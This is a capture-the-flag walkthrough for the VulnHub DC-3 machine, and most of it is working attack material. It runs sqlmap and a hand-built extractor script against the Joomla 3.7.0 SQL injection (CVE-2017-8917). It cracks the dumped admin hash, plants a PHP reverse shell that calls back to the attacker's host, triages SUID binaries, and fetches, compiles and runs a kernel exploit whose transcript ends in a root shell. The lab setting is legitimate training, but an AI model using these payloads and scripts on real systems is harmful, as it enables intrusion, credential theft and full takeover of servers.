I Love Doing Vulnerable VMs: DC-3

Download: https://www.vulnhub.com/entry/dc-3,312/

Host discovery

Port scan: only port 80 is open. With nmap's -A option (version detection plus default scripts) the HTTP banner also shows that the site runs the Joomla CMS.

Browse port 80

Directory scan: this reveals the site's admin backend (/administrator/).

Using nikto: nikto -host 192.168.44.144

Using dirsearch (-e php restricts the wordlist extensions to .php):

python3 dirsearch.py -u http://192.168.44.144 -e php

Use joomscan, the Joomla-specific vulnerability scanner, to find the exact Joomla version:

git clone https://github.com/rezasp/joomscan.git

cd joomscan

perl joomscan.pl -u http://192.168.44.144

Use searchsploit to look for known exploits for Joomla 3.7.0:

searchsploit joomla 3.7.0

Read the entry

Reading the file at the path searchsploit reports shows that this version has an SQL injection, CVE-2017-8917: the com_fields component builds its ORDER BY clause from the unsanitized list[fullordering] request parameter, and the vulnerable view is reachable without logging in.

Open sqlmap and start injecting. The injection point is the list[fullordering] parameter, so it is pinned with -p; the table name #__users has to be quoted, because an unquoted # starts a shell comment and sqlmap would never see it.

Enumerate databases

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p "list[fullordering]" -u "http://192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"

Enumerate tables

python2 sqlmap.py --risk=3 --level=5 --random-agent -p "list[fullordering]" -u "http://192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables

Enumerate columns

python2 sqlmap.py --risk=3 --level=5 --random-agent -p "list[fullordering]" -u "http://192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" --columns

Dump contents

python2 sqlmap.py --risk=3 --level=5 --random-agent -p "list[fullordering]" -u "http://192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" -C "name,password" --dump
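Added example, not from the original write-up: a manual error-based extractor for the same CVE-2017-8917 sink the sqlmap commands above are driven against. It builds the request URL for an arbitrary SQL expression, handles the 32-character limit of the updatexml() error text with substring windows, and parses the leaked value out of a response body. The base URL, the sample response and the query in the usage comment are placeholders or constructed for the demo.

```shell
#!/bin/sh
# Added example, not part of the original write-up: manual error-based
# extraction through the Joomla 3.7.0 com_fields ORDER BY injection
# (CVE-2017-8917), the same sink the sqlmap commands above use.
# The base URL and the sample response below are placeholders/constructed.

# Percent-encode the characters our payloads contain (enough for this use).
urlencode() {
  printf '%s' "$1" | sed -e 's/%/%25/g' -e 's/ /%20/g' -e 's/(/%28/g' \
    -e 's/)/%29/g' -e 's/,/%2C/g' -e 's/~/%7E/g' -e 's/#/%23/g' \
    -e "s/'/%27/g" -e 's/=/%3D/g'
}

# Build the request URL for one SQL expression. updatexml() fails on a
# non-XPath string and echoes it in the error, so the value is leaked;
# the 0x7e ('~') prefix gives a known marker to parse on.
sqli_url() {
  base="$1"; expr="$2"
  payload="updatexml(0x23,concat(0x7e,($expr)),1)"
  printf '%s/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=%s\n' \
    "$base" "$(urlencode "$payload")"
}

# The error text is cut at 32 characters, so values longer than 31 bytes
# (a 60-byte bcrypt hash, for instance) are read in substring windows.
sqli_url_chunk() {
  sqli_url "$1" "substr(($2),$3,31)"
}

# Pull the leaked value out of a response body on stdin.
extract_leak() {
  sed -n "s/.*XPATH syntax error: '~\([^']*\)'.*/\1/p" | head -n 1
}

# Constructed sample of what the 3.7.0 error page contains.
SAMPLE_RESPONSE="<h1>Error: 500</h1><p>XPATH syntax error: '~joomladb'</p>"

# Offline demo: parse the constructed response (prints joomladb).
printf '%s' "$SAMPLE_RESPONSE" | extract_leak

# Against a live box (not run here): -g stops curl from globbing the [ ]
# in the parameter name. A 60-char hash needs the windows at 1 and 32.
# for off in 1 32; do
#   curl -sg "$(sqli_url_chunk http://192.168.44.144 \
#     "select password from \`#__users\` where username='admin'" "$off")" | extract_leak
# done
```

The substring windows are the detail sqlmap hides: a single updatexml() call never returns more than 31 bytes of the value after the marker, so a bcrypt hash read in one request comes back silently truncated.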

Username: admin

Password hash: $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

Crack it with John on Kali (the $2y$ prefix is bcrypt, which John detects on its own; with the hash saved in hash.txt: john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt). The backend login password is snoopy.

Log in to the backend found earlier: http://192.168.44.144/administrator/

Poking around the backend turns up the template editor, where you can create a new PHP file inside a template; that is all it takes for a reverse shell (192.168.44.142 is the Kali box):

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.44.142/8080 0>&1'");?>

Start a listener on Kali: nc -lvvp 8080

Then request the shell file in the browser. Finding the right path took a while: combine the templates directory from the earlier directory scan with the template's name (beez3), and remember that Linux paths are case-sensitive, so the new file is served from http://192.168.44.144/templates/beez3/.

At this point Kali has caught the shell.

The shell is low-privileged (www-data). First try SUID privilege escalation; each of the following lists the SUID executables on the system:

  1. find / -perm -u=s -type f 2>/dev/null

  2. find / -user root -perm -4000 -print 2>/dev/null

  3. find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Binaries that are known to be usable for privilege escalation when SUID: nmap, vim, find, bash, more, less, nano, cp.

None of these turned up, so there is no SUID route to root.
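Added example, not from the original write-up: the SUID search from the find commands above, with a triage pass that flags any hit whose name is on the write-up's list of binaries known to give a shell or file access when SUID. The search root and the list are parameters so it can be run against a scratch directory as well as /.

```shell
#!/bin/sh
# Added example, not part of the original write-up: SUID enumeration plus
# triage against the write-up's list of binaries that are known to hand
# over a shell or file access when they run SUID root.
KNOWN_SUID_ABUSABLE="nmap vim find bash more less nano cp"

# All SUID regular files under a root directory ($1, default /).
# Unreadable directories are silenced, as in the original commands.
list_suid() {
  find "${1:-/}" -type f -perm -4000 2>/dev/null
}

# One line per SUID file: "ABUSABLE <path>" when its name is on the list,
# otherwise "review <path>" (an unknown SUID binary still deserves a look).
triage_suid() {
  list_suid "$1" | while IFS= read -r f; do
    b=$(basename "$f")
    hit=no
    for k in $KNOWN_SUID_ABUSABLE; do
      if [ "$b" = "$k" ]; then hit=yes; break; fi
    done
    if [ "$hit" = yes ]; then echo "ABUSABLE $f"; else echo "review $f"; fi
  done
}

# Number of flagged binaries; a wrapper script would branch on this.
# grep -c exits 1 on zero matches, hence the || true.
count_abusable() {
  triage_suid "$1" | grep -c '^ABUSABLE ' || true
}

# On the target: triage_suid /
# A match means: work out how that binary can be driven to exec a shell
# or read a root-only file before moving on to kernel exploits.
```

The list is the one the write-up gives; a real engagement would compare against the full GTFOBins set, but the matching logic is the same.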

Try a kernel exploit instead.

Check the Linux version.

Use searchsploit to look for an exploit matching it.

Read the exploit's write-up at the path searchsploit gives: cat /usr/share/exploitdb/exploits/linux/local/39772.txt

(39772 is the bpf(BPF_PROG_LOAD) double-fdput() bug, CVE-2016-4557, which hits the 4.4 kernels shipped with Ubuntu 16.04.)

The write-up gives the download address for the exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

Find a directory we can write to and execute from.

Change to the tmp directory under the web root (/var/www/html/tmp, as the transcript below shows) and download the exploit from the address in the searchsploit entry:

Change directory: cd /var/www/html/tmp

Download: wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

Unzip: unzip 39772.zip

Unpack the inner archive: cd 39772 && tar -xvf exploit.tar

Change directory: cd ebpf_mapfd_doubleput_exploit/

Run: ./compile.sh
     ./doubleput

That gives a root shell. compile.sh builds the exploit and its SUID helper on the box, so a compiler has to be present on the target (it is on DC-3, as the transcript shows).
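Added example, not from the original write-up: pre-flight checks for the "find a directory we can write to and execute from" step. The directory must be writable, and its filesystem must not be mounted noexec, or the binaries compile.sh produces will not run; the web root's tmp directory is the kind of place that passes both checks when /tmp does not. The mount table in the block is constructed for the demo; on a target, read /proc/mounts.

```shell
#!/bin/sh
# Added example, not part of the original write-up: pre-flight checks
# before staging a compiled exploit such as 39772. The mount table below
# is constructed for the demo; on a target use: cat /proc/mounts

SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0'

# Mount options of the deepest mountpoint containing path $2, read from a
# /proc/mounts-formatted table in $1 (fields: device mountpoint fstype opts).
mount_opts_for() {
  printf '%s\n' "$1" | awk -v p="$2" '
    {
      mp = $2
      if (mp == "/" || p == mp || index(p, mp "/") == 1) {
        if (length(mp) > best_len) { best_len = length(mp); best = $4 }
      }
    }
    END { print best }'
}

# True (exit 0) when the path lives on a noexec mount.
is_noexec() {
  case ",$(mount_opts_for "$1" "$2")," in
    *,noexec,*) return 0 ;;
    *) return 1 ;;
  esac
}

# First candidate directory that exists, is writable and allows exec.
# $1 is the mount table, the remaining arguments are candidates in order.
pick_staging_dir() {
  table="$1"; shift
  for d in "$@"; do
    [ -d "$d" ] && [ -w "$d" ] || continue
    if is_noexec "$table" "$d"; then continue; fi
    printf '%s\n' "$d"
    return 0
  done
  return 1
}

# compile.sh needs a compiler on the box; without one, build on the
# attacking machine against a matching libc and copy the binaries over.
has_compiler() {
  command -v gcc >/dev/null 2>&1 || command -v cc >/dev/null 2>&1
}

# Demo with the constructed table: /tmp is noexec there, so it is skipped
# and the first remaining candidate that exists on this machine is chosen.
pick_staging_dir "$SAMPLE_MOUNTS" /tmp /var/www/html/tmp /dev/shm \
  || echo "no writable+exec directory among the candidates"
```

Longest-prefix matching matters because /proc/mounts lists nested mounts in any order; a path under /tmp must pick up /tmp's options, not those of /.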

www-data@DC3VM:/var/www/html$ cd tmp
cd tmp
www-data@DC3VM:/var/www/html/tmp$ ls
ls
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
--2020-04-09 23:27:16--  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip                                                
Resolving github.com (github.com)... 13.250.177.223                                                                                                                  
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2020-04-09 23:27:17--  https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.108.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'

     0K ......                                                100% 4.44M=0.002s

2020-04-09 23:27:18 (4.44 MB/s) - '39772.zip' saved [7025/7025]

www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772.zip
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ unzip 39772.zip
unzip 39772.zip
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store         
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store  
  inflating: 39772/crasher.tar       
  inflating: __MACOSX/39772/._crasher.tar  
  inflating: 39772/exploit.tar       
  inflating: __MACOSX/39772/._exploit.tar  
www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772
39772.zip
__MACOSX
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ cd 3977
cd 39772
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ tar -xvf exploit.tar
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
ebpf_mapfd_doubleput_exploit
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ cd ebpf
cd ebpf_mapfd_doubleput_exploit/
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput.c
hello.c
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doub
./doub
bash: ./doub: No such file or directory
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...

bash -i
bash: cannot set terminal process group (1315): Inappropriate ioctl for device
bash: no job control in this shell
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# exit
bash: [2708: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ 